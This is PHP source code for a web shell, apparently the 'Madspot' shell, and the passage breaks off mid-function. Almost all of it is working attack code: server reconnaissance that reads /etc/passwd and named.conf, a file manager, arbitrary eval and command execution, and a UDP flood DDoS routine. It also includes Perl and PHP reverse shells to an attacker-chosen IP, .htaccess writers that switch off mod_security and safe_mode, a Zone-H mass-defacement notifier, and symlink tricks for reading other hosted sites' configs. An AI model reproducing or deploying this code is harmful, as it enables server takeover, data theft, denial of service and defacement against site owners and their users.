Error"); } } if(!$_SESSION['sec']): echo $form; exit(); endif; if($_GET['log'] == 'out') { session_destroy(); } echo "UnderFamily | Çıkış yap"; ?>

ON "; $of=" OFF "; $none=" NONE "; if(function_exists('curl_version')) $curl=$on; else $curl=$of; if(function_exists('mysql_get_client_info')) $mysql=$on; else $mysql=$of; if(function_exists('mssql_connect')) $mssql=$on; else $mssql=$of; if(function_exists('pg_connect')) $pg=$on; else $pg=$of; if(function_exists('oci_connect')) $or=$on; else $or=$of; if(@ini_get('disable_functions')) $disfun=@ini_get('disable_functions'); else $disfun="All Functions Enable"; if(@ini_get('safe_mode')) $safe_modes="ON"; else $safe_modes="OFF"; if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir'); else $open_b=$none; if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir'); else $safe_exe=$none; if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir'); else $safe_include=$none; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $drives = ""; foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; echo ' '; echo ""; echo '

'; if($GLOBALS['sys']=='unix' ) { if(!@ini_get('safe_mode')) { echo ''; } else { echo ''; } } else { echo ''; } echo ''; if($GLOBALS[sys]=="win") { echo ''; } echo '

Uname:	'.substr(@php_uname(), 0, 120).'
User:	'. $uid . ' [ ' . $user . ' ] Group: ' . $gid . ' [ ' . $group . ' ]
PHP:	'.@phpversion(). ' Safe Mode:'.$safe_modes.'
Our IP:	'.@$_SERVER["SERVER_ADDR"].' Server IP: '.@$_SERVER["REMOTE_ADDR"].'
WEBS:	'; if($GLOBALS['sys']=='unix') { $d0mains = @file("/etc/named.conf"); if(!$d0mains) { echo "CANT READ named.conf"; } else { $count; foreach($d0mains as $d0main) { if(@ereg("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } echo "$count Domains"; } } else{ echo"CANT READ |Windows|";} echo '
HDD:	'.madSize($totalSpace).' Free:' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
Useful : '; $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); foreach($userful as $item) if(madWhich($item)) echo $item.','; echo '
Downloader:'; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); foreach($downloaders as $item2) if(madWhich($item2)) echo $item2.','; echo '
useful:'; echo '--------------
Downloader: -------------
Window:'; echo madEx('ver'); echo '
Downloader: -------------
Disabled functions:'.$disfun.'
cURL:'.$curl.' MySQL:'.$mysql.' MSSQL:'.$mssql.' PostgreSQL:'.$pg.' Oracle: '.$or.'		'.base64_decode("PGEgaHJlZj0iaHR0cDovL3IwMHQuaW5mby8iIHRhcmdldD0iX2JsYW5rIj48c3Bhbj48Zm9udCBjb2xvcj0iI0NDOTkwMCI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7U0hFTEwtQVJDSMSwVkU8L2ZvbnQ+PC9zcGFuPjwvYT4=").'
Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.' Safe_mode_include_dir:'.$safe_include.'
Server	'.@getenv('SERVER_SOFTWARE').'
DRIVE:	'.$drives.'
PWD:	'.$cwd_links.' |CURRENT|

• HOME
• PROCESS
• EVAL
• SQL
• HASH
• CONNECT
• ZONE-H
• DDOS
• SAFE MODE
• SYMLINK
• MADSPOT
• KIll C0de

'; } function madfooter() { echo "

__MK FILE__	__MK DIR__	__DELETE__	__CHMOD__
__CHANGE DIR__		__HTTP DOWNLOAD__
__EXECUTE__
Upload file:

"; } if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function madWhich($p) { $path = madEx('which ' . $p); if(!empty($path)) return $path; return false; } function madSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function madPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function madPermsColor($f) { if (!@is_readable($f)) return '' . madPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . madPerms(@fileperms($f)) . ''; else return '' . madPerms(@fileperms($f)) . ''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function madFilesMan() { madhead(); echo '

'; if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_dir(@$_POST['p2'])) deleteDir(@$_POST['p2']); else @unlink(@$_POST['p2']); break; default: if(!empty($_POST['p1'])) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['c'] = @$_POST['c']; } break; } } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo '

| Access Denied! |

';madFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "

Name	Size	Modify	Owner/Group	Permissions	Actions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '>| ' . htmlspecialchars($f['name']) . ' |').'	'.(($f['type']=='file')?madSize($f['size']):$f['type']).'	'.$f['modify'].'	'.$f['owner'].'/'.$f['group'].'	'.$f['perms'] .'	R T'.(($f['type']=='file')?' E D':'').' X

"; madfooter(); } function madFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } madhead(); echo '

'; if( !file_exists(@$_POST['p1']) ) { echo "

FILE DOEST NOT EXITS 

"; madFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' Permission: '.madPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo '
'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?' '.$v.' ':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '

'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '

'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '

'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'

'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '

'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '

'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '

'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '

'.$h[0].'

'.$h[1].'

'.htmlspecialchars($h[2]).'

'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '

'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '

'; break; } echo ''; madFooter(); } function madphpeval() { madhead(); if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) { echo '

'; ob_start(); $INI=ini_get_all(); print '' .'' .'' .'' .''; foreach ($INI as $param => $values) print "\n".'' .'' .'' .'' .''; $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) { echo '

'; ob_start(); $EXT=get_loaded_extensions (); print '

Param	Global value	Local Value	Access
'.$param.'	'.$values['global_value'].'	'.$values['local_value'].'	'.$values['access'].'

'."\n".'

' .implode('

', $EXT) .'

' .count($EXT).' extensions loaded'; echo '

'; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo '

| INI_INFO | | phpinfo | | extensions |

'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').''; echo '

'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '

'; madfooter(); } function madhash() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'Htmlspecialchars' => 'htmlspecialchars', ); madhead(); echo '

'; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo "

"; foreach($stringTools as $k => $v) echo "".$k.""; echo "
".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."

"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo "

"; madFooter(); } function maddos() { madhead(); echo '

'; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '| UDP DOSSIER |

Host :Time :Port :

'; echo "

"; if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3'])) { $packets=0; ignore_user_abort(true); $exec_time=$_POST['p2']; $time=time(); $max_time=$exec_time+$time; $host=$_POST['p1']; $portudp=$_POST['p3']; for($i=0;$i<65000;$i++) { $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second"; echo "

"; } echo '

'; madfooter(); } function madproc() { madhead(); echo "

"; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; if($GLOBALS['sys']=="win") { $process=array( "System Info" =>"systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); } else { $process=array( "Process status" => "ps aux", "Syslog" =>"cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" =>"cat /etc/hosts", "Passwd" =>"cat /etc/passwd", "Cpuinfo"=>"cat /proc/cpuinfo", "Version"=>"cat /proc/version", "Sbin"=>"ls -al /usr/sbin", "Interrupts"=>"cat /proc/interrupts", "lsattr"=>"lsattr -va", "Uptime"=>"uptime", "Fstab" =>"cat /etc/fstab", "HDD Space" => "df -h" );} foreach($process as $n => $link) { echo ' | '.$n.' | '; } echo ""; if(!empty($_POST['p1'])) { echo "

"; echo madEx($_POST['p1']); echo '

'; } echo "

"; madfooter(); } function madsafe() { madhead(); echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| ".$GLOBALS['cwd']." |
"; echo '| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) | '; if(!empty($_POST['p2']) && isset($_POST['p2'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fil); } if(!empty($_POST['p1'])&& isset($_POST['p1'])) { $fil=fopen($GLOBALS['cwd']."php.ini","w"); fwrite($fil,'safe_mode=OFF disable_functions=NONE'); fclose($fil); } if(!empty($_POST['p3']) && isset($_POST['p3'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .pl AddHandler cgi-script .pl'); fclose($fil); } echo "

"; madfooter(); } function madconnect() { madhead(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; echo "

| PERL AND PHP(threads) BACK CONNECT |

"; echo "

PERL BACK CONNECT
IP: Port:

"; echo "

PHP BACK CONNECT
IP: Port:

"; if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,"w") or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); echo "

Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."
Connecting...

"; @unlink("/tmp/bc.pl"); } if($_POST['p1']=='php') { @set_time_limit (0); $ip = $_POST['p2']; $port =$_POST['p3']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; echo "

"; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { echo "Cant fork!
"; exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { echo "Error: Can't setsid()
"; exit(1); } $daemon = 1; } else { echo "WARNING: Failed to daemonise.  This is quite common and not fatal
"; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "$errstr ($errno)"; exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell
"; exit(1); } @stream_set_blocking($pipes[0], 0); @stream_set_blocking($pipes[1], 0); @stream_set_blocking($pipes[2], 0); @stream_set_blocking($sock, 0); echo "Successfully opened reverse shell to $ip:$port
"; while (1) { if (feof($sock)) { echo "ERROR: Shell connection terminated
"; break; } if (feof($pipes[1])) { echo "ERROR: Shell process terminated
"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) echo "SOCK READ
"; $input=fread($sock, $chunk_size); if ($debug) echo "SOCK: $input
"; fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) echo "STDOUT READ
"; $input = fread($pipes[1], $chunk_size); if ($debug) echo "STDOUT: $input
"; fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) echo "STDERR READ
"; $input = fread($pipes[2], $chunk_size); if ($debug) echo "STDERR: $input
"; fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "

"; } } echo "

"; madfooter(); } function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } function madzoneh() { madhead(); if(!function_exists('curl_version')) { echo "

PHP CURL NOT EXIT

"; } echo "

"; echo '

|ZONE-H MASS DEFACER |

| Notifier |

--------SELECT-------- known vulnerability (i.e. unpatched system) undisclosed (new) vulnerability configuration / admin. mistake brute force attack social engineering Web Server intrusion Web Server external module intrusion Mail Server intrusion FTP Server intrusion SSH Server intrusion Telnet Server intrusion RPC Server intrusion Shares misconfiguration Other Server intrusion SQL Injection URL Poisoning File Inclusion Other Web Application bug Remote administrative panel access bruteforcing Remote administrative panel access password guessing Remote administrative panel access social engineering Attack against administrator(password stealing/sniffing) Access credentials through Man In the Middle attack Remote service password guessing Remote service password bruteforce Rerouting after attacking the Firewall Rerouting after attacking the Router DNS attack through social engineering DNS attack through cache poisoning Not available
Not available Heh...just for fun! Revenge against that website Political reasons As a challenge I just want to be the best defacer Patriotism Not available
List Of Domains

'; if(isset($_POST['p1']) && isset($_POST['p2'])) { $hacker =$_POST['p1']; $method =$_POST['p2']; $neden ="Not available"; $site =$_POST['p3']; $i = 0; $sites = explode("\n", $site); echo "

"; while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://".$sites[$i]; } ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !
"; ++$i; } "Sending Sites To Zone-H Has Been Completed Successfully !! 

"; } echo "

"; madfooter(); } function madspot() { madhead(); echo "

"; echo "

    
                           |`-:_
  ,----....____            |    `+.                                                           
 (             ````----....|___   |
  \     _                      ````----....____
   \    _)  Coded By: Ikram Ali                ```---.._                       
    \                                                   \ 
  )`.\  )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )hh
-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `
   Madspot is a Team of professional Ethical Hackers From Pakistan.
   We have Years of  Experience in  Security, Penetration & Coding 
   And can Break and Secure.
   
   Version 1.0
   
   Contact : http://www.madspot.net
   
   if you found bug contact our team 
   
   
              .=''=.             
             / _  _ \
            |  d  b  |
            \   /\   / 
           ,/'-=\/=-'\,
          / /        \ \     -----------------------------
         | / Zahid    \ |    Madspot Digital Security Team
         \/ \ Rasheed/ \/    -----------------------------
             '.    .'
             _|`~~`|_
             /|\  /|\    
	
       .-  -.        .-====-.      ,-------.      .-=<>=-.
   /_-\'''/-_\      / / '' \ \     |,-----.|     /__----__\
  |/  o) (o  \|    | | ')(' | |   /,'-----'.\   |/ (')(') \|
   \   ._.   /      \ \    / /   {_/(') (')\_}   \   __   /
   ,>-_,,,_-<.       >'=jf='<     `.   _   .'    ,'--__--'.
 / Waqar.Khan  \    /        \     /'-___-'\    /    :|    \
(_)     .     (_)  /  Ikram   \   / M-Usman \  (_)   :|   (_)
 \_-----'____--/  (_)  Ali   (_) (_)_______(_)   |___:|____|
  \___________/     |________|     \_______/     | Afrasiab|
	
  
  
    

"; madfooter(); } function madsymlink() { madhead(); $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl ); $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl ); echo '

| Domains | | Whole Server Symlink | | Config PHP symlink |

'; if(isset($_POST['p1']) && $_POST['p1']=='website') { echo ""; $d0mains = @file("/etc/named.conf"); if(!$d0mains){ echo "

Cant access this file on server -> [ /etc/named.conf ]

"; } echo ""; $count=1; foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); $count++; }}} echo "

Count	domains	users
".$count."	".$domains[1][0]."	".$user['name']."

"; } if(isset($_POST['p2']) && $_POST['p2']=='whole') { @set_time_limit(0); echo ""; @mkdir('sym',0777); $IIIIIIIIIIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $IIIIIIIIII1I =@fopen ('sym/.htaccess','w'); fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1); @symlink('/','sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if(!$IIIIIIIIIllI) { echo "

# Cant access this file on server -> [ /etc/named.conf ]

"; } else { echo ""; foreach($IIIIIIIIIllI as $IIIIIIIIIll1){ if(@eregi('zone',$IIIIIIIIIll1)){ preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11); flush(); if(strlen(trim($IIIIIIIIIl11[1][0])) >2){ $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0])); $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ; @symlink('/','sym/root'); $IIIIIIII1I1l = $IIIIIIIIIl11[1][0]; $IIIIIIII1I11 = '\.ir'; $IIIIIIII1lII = '\.il'; if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) ) { $IIIIIIII1I1l = "

".$IIIIIIIIIl11[1][0].'

'; } echo " "; flush(); } } } } echo "

Domains	Users	symlink
'.$IIIIIIII1I1l.'	'.$IIIIIIIII1I1['name']."	symlink

"; } if(isset($_POST['p3']) && $_POST['p3']=='config') { echo ""; @mkdir('sym',0777); $IIIIIIIIIIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $IIIIIIIIII1I =@fopen ('sym/.htaccess','w'); @fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1); @symlink('/','sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if(!$IIIIIIIIIllI) { echo "

# Cant access this file on server -> [ /etc/named.conf ]

